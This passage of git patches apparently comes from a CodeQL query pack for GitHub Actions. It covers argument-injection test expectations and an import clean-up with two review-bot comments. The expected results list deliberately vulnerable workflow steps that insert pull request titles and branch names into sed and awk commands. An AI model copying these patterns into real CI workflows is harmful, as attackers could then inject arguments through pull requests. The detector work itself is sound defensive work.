| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | awk | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | -| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 90e7101e5fd..12171d8c7f2 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected 
@@ -1,20 +1,23 @@ edges -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | 
.github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| 
.github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | +| 
.github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD 
)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select From c5c3cd1726b135e24958f8c6f2b26b872850b4d8 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 11:47:35 +0200 Subject: [PATCH 0589/1267] Clean imports --- .../security/ArgumentInjectionQuery.qll | 1 - .../security/ArtifactPoisoningQuery.qll | 1 - .../actions/security/CachePoisoningQuery.qll | 2 -- .../codeql/actions/security/ControlChecks.qll | 3 +++ .../security/EnvPathInjectionQuery.qll | 23 ++++++++----------- .../actions/security/EnvVarInjectionQuery.qll | 3 --- .../security/OutputClobberingQuery.qll | 3 --- .../actions/security/PoisonableSteps.qll | 1 - .../security/SecretExfiltrationQuery.qll | 1 - .../actions/security/SelfHostedQuery.qll | 1 - .../UseOfKnownVulnerableActionQuery.qll | 1 - .../CompositeActionsSinks.ql | 0 .../CompositeActionsSources.ql | 0 .../CompositeActionsSummaries.ql | 0 .../ReusableWorkflowsSinks.ql | 0 .../ReusableWorkflowsSources.ql | 0 .../ReusableWorkflowsSummaries.ql | 0 .../Security/CWE-074/OutputClobberingHigh.ql | 1 + .../CWE-077/EnvPathInjectionCritical.ql | 1 + .../CWE-077/EnvPathInjectionMedium.ql | 1 + .../CWE-077/EnvVarInjectionCritical.ql | 1 + .../Security/CWE-077/EnvVarInjectionMedium.ql | 1 + .../Models/CompositeActionsSinks.qlref | 2 +- .../Models/CompositeActionsSources.qlref | 2 +- .../Models/CompositeActionsSummaries.qlref | 2 +- .../Models/ReusableWorkflowsSinks.qlref | 2 +- .../Models/ReusableWorkflowsSources.qlref | 2 +- .../Models/ReusableWorkflowsSummaries.qlref | 2 +- .../workflows/artifactpoisoning101.yml | 19 +++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 +++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 1 + 33 files changed, 52 insertions(+), 33 deletions(-) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSinks.ql (100%) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSources.ql (100%) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSummaries.ql (100%) rename ql/src/{Security/CWE-020 => 
Models}/ReusableWorkflowsSinks.ql (100%) rename ql/src/{Security/CWE-020 => Models}/ReusableWorkflowsSources.ql (100%) rename ql/src/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.ql (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index f7e4a983445..1d461cca3df 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -2,7 +2,6 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow abstract class ArgumentInjectionSink extends DataFlow::Node { diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d06b125ca32..9355462962d 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -1,7 +1,6 @@ import actions private import codeql.actions.TaintTracking import codeql.actions.DataFlow -private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources import codeql.actions.security.PoisonableSteps diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index a0113beed46..e5c5a365510 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,6 +1,4 @@ import actions -import codeql.actions.config.Config -import codeql.actions.Helper string defaultBranchTriggerEvent() { result = 
diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 86c7d989522..3b15fc78d10 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -253,6 +253,9 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { or this.getArgument("exit") = "true" ) + or + this.getCallee() = "actions/github-script" and + this.getArgument("script").splitAt("\n").matches("%getMembershipForUserInOrg%") } } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 859f625e068..33efc9b1bc8 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -3,20 +3,11 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class EnvPathInjectionSink extends DataFlow::Node { } /** * Holds if a Run step declares a PATH environment variable with contents from a local file. - * e.g. - * run: | - * cat foo.txt >> $GITHUB_PATH - * echo "$(cat foo.txt)" >> $GITHUB_PATH - * FOO=$(cat foo.txt) - * echo "$FOO" >> $GITHUB_PATH */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { 
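Review bot: The `actions/github-script` disjunct added to `AssociationActionCheck` treats a step as a membership check whenever any line of `script` contains the text `getMembershipForUserInOrg`, which includes a commented-out call or a call whose response is never acted on. If these check classes are used to lower or suppress alerts (the class body is only partly visible in this hunk), that heuristic is a source of false negatives. At minimum, document it above the disjunct, e.g. `// heuristic: presence of the call is taken as the check; use of its result is not verified`.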
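Review bot: After the first `EnvPathInjectionQuery.qll` hunk the file still declares `abstract class EnvPathInjectionSink extends DataFlow::Node` but no longer imports `codeql.actions.DataFlow` itself. The name presumably now resolves only through a remaining `private import`; the `ArtifactPoisoningQuery.qll` hunk earlier in this commit keeps a public `import codeql.actions.DataFlow`. A later import clean-up in that file would then break this library. Keeping `private import codeql.actions.DataFlow` here would remove that dependency without re-exporting it to queries, and the same applies to the matching hunks in `EnvVarInjectionQuery.qll` and `OutputClobberingQuery.qll`.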
@@ -28,11 +19,15 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( + // echo "$(cat foo.txt)" >> $GITHUB_PATH + // FOO=$(cat foo.txt) + // echo "$FOO" >> $GITHUB_PATH exists(string cmd | - run.getScript().getACmdReachingGitHubPathWrite(cmd) and - run.getScript().getAFileReadCommand() = cmd + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubPathWrite(cmd) ) or + // cat foo.txt >> $GITHUB_PATH run.getScript().fileToGitHubPath(_) ) ) @@ -91,8 +86,10 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run.getScript() and ( - run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) or - run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) or + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + or run.getScript().getAnEnvReachingGitHubPathWrite(var) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 13d6312b585..99e9537a857 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -3,9 +3,6 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import 